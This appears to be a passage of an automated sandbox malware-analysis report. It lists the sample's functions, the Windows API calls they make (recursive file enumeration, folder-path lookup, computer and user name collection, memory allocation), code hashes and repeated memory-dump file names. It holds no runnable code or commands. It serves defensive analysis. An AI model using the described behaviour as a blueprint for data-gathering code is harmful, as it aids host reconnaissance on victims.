Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e4d878ed992f22e1bec2e47752251f22b3023324661ea1848855181902b72667
Instruction ID: 1b8dddba79e4ec0636ec12d8aaccc5e1d5739db600cbeeae534ae0a0e641e5cb
Opcode Fuzzy Hash: e4d878ed992f22e1bec2e47752251f22b3023324661ea1848855181902b72667
Instruction Fuzzy Hash: 2241DA74A00209EFCB54CF58C494BADBBB1FF44314F248699E9599B745C732EA81DF84

Function 00105050 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00108DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00108E0B

lstrcat.KERNEL32(?,00000000), ref: 0010508A
lstrcat.KERNEL32(?,00CDE490), ref: 001050A8

Part of subcall function 00104910: wsprintfA.USER32 ref: 0010492C
Part of subcall function 00104910: FindFirstFileA.KERNEL32(?,?), ref: 00104943

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: 9fd5c9a4e57943182bc77a2eb1357f4ee1cb53f5e1b12869ae50d7ab72e167a0
Instruction ID: 2142a706d4420050dec1245f47fcceaf4d7cf625e47835d7fdb8027b8cc6cecb
Opcode Fuzzy Hash: 9fd5c9a4e57943182bc77a2eb1357f4ee1cb53f5e1b12869ae50d7ab72e167a0
Instruction Fuzzy Hash: 4401D676900608A7C754FB70DC82EEE333CAB64700F004558B6CA970D1EFB19AC88BE2

Function 000F10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 000F10B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 000F10F7

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 371baae690edd1f505eefaf4be140b0c970531deda63b6efaf4094fe470e1751
Instruction ID: 0bca9aa74bffa60fe93de34dda93c87f65d2db243f7ea5abaa1dd5b7594af4ac
Opcode Fuzzy Hash: 371baae690edd1f505eefaf4be140b0c970531deda63b6efaf4094fe470e1751
Instruction Fuzzy Hash: 11F0E971641208BBE71496A49C89FBAB7DCD705715F300444F644E7280D5715E00DA90

Function 00108D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,000F1B54,?,?,0011564C,?,?,00110E1F), ref: 00108D9F

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: b8e422b45cc0e73a8852ead38fd8f6beaa8b44e9ef70aa2bb60b6d5685e33f40
Instruction ID: 9aea5a6626526cc229b6554be2a58096a2d8e800621411b99f84e6554088ebe9
Opcode Fuzzy Hash: b8e422b45cc0e73a8852ead38fd8f6beaa8b44e9ef70aa2bb60b6d5685e33f40
Instruction Fuzzy Hash: 38F0A570D0420CEBCB04EFA4D949ADCBB74EB20310F508299E8A6672D0DBB49A55DB81

Function 00108DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00108E0B

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 9b159bbc4bc0240014e0e78344781bba5ff66735a5256a9e7ed56b0d8c578696
Instruction ID: a604e1f513b9471a1ba6d4588e8532a25665ca7362a70e35ce9ee1fc60e537a9
Opcode Fuzzy Hash: 9b159bbc4bc0240014e0e78344781bba5ff66735a5256a9e7ed56b0d8c578696
Instruction Fuzzy Hash: 5AE01A31A4034C6BDB91EB94CC96FAE777C9B44B01F004295BA4C5A1C0DFB0AB858B91

Function 000F1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 001078E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00107910
Part of subcall function 001078E0: RtlAllocateHeap.NTDLL(00000000), ref: 00107917
Part of subcall function 001078E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0010792F

Part of subcall function 00107850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000F11B7), ref: 00107880
Part of subcall function 00107850: RtlAllocateHeap.NTDLL(00000000), ref: 00107887
Part of subcall function 00107850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0010789F

ExitProcess.KERNEL32 ref: 000F11C6

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: 605585a67b43377847411510fd0f9234cdbddbd2d075d8733a4e1e683b97248f
Instruction ID: a35d69a2e41032b1579c227ef2f5ede4ebcf67b501f193382830dd52058a6c81
Opcode Fuzzy Hash: 605585a67b43377847411510fd0f9234cdbddbd2d075d8733a4e1e683b97248f
Instruction Fuzzy Hash: 0DE012B5E5470593DA0073B1AC4BB6A329C6B24345F044825FAC5D3582FBA5F80085A6

Non-executed Functions

Function 001038B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 001038CC
FindFirstFileA.KERNEL32(?,?), ref: 001038E3
lstrcat.KERNEL32(?,?), ref: 00103935
StrCmpCA.SHLWAPI(?,00110F70), ref: 00103947
StrCmpCA.SHLWAPI(?,00110F74), ref: 0010395D
FindNextFileA.KERNEL32(000000FF,?), ref: 00103C67
FindClose.KERNEL32(000000FF), ref: 00103C7C

Strings

%s\%s, xrefs: 0010397A
%s%s, xrefs: 00103AAD
%s\%s\%s, xrefs: 00103A4A
%s\%s, xrefs: 00103A6F
%s\*, xrefs: 001038C0

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: 6251fc7de6c01cfc586906eb6d94fabf2263827d0e71cd620c00ca072c361811
Instruction ID: af5cf50aa0537fb9611156fc3624dd55814c09fae90538df6ab5f0ae97d78ac2
Opcode Fuzzy Hash: 6251fc7de6c01cfc586906eb6d94fabf2263827d0e71cd620c00ca072c361811
Instruction Fuzzy Hash: 2CA160B1A006189BDB25DFA4DC85FFA737CBB58300F044588B69D96181EBB59B84CF62

Function 00104570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00104580
RtlAllocateHeap.NTDLL(00000000), ref: 00104587
wsprintfA.USER32 ref: 001045A6
FindFirstFileA.KERNEL32(?,?), ref: 001045BD
StrCmpCA.SHLWAPI(?,00110FC4), ref: 001045EB
StrCmpCA.SHLWAPI(?,00110FC8), ref: 00104601
FindNextFileA.KERNEL32(000000FF,?), ref: 0010468B
FindClose.KERNEL32(000000FF), ref: 001046A0
lstrcat.KERNEL32(?,00CDE8A8), ref: 001046C5
lstrcat.KERNEL32(?,00CDDA20), ref: 001046D8
lstrlen.KERNEL32(?), ref: 001046E5
lstrlen.KERNEL32(?), ref: 001046F6

Strings

%s\*, xrefs: 0010459A
%s\%s, xrefs: 0010461B

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 671575355-2848263008
Opcode ID: 9bef118bece3c2b5915f5042d4e0e3d42b8841ba4e6f18cd668c4a04af51d5a7
Instruction ID: 9cf049037a44a7530a9b520d22a73ab6597225cfd96e20bfbadfb37b6b3b4dd3
Opcode Fuzzy Hash: 9bef118bece3c2b5915f5042d4e0e3d42b8841ba4e6f18cd668c4a04af51d5a7
Instruction Fuzzy Hash: C45186B19006189BC725EBB0DCC9FEE737CAB58700F404588F68996090EFB5DB858F92

Function 000FED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 000FED3E
FindFirstFileA.KERNEL32(?,?), ref: 000FED55
StrCmpCA.SHLWAPI(?,00111538), ref: 000FEDAB
StrCmpCA.SHLWAPI(?,0011153C), ref: 000FEDC1
FindNextFileA.KERNEL32(000000FF,?), ref: 000FF2AE
FindClose.KERNEL32(000000FF), ref: 000FF2C3

Strings

%s\*.*, xrefs: 000FED32

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

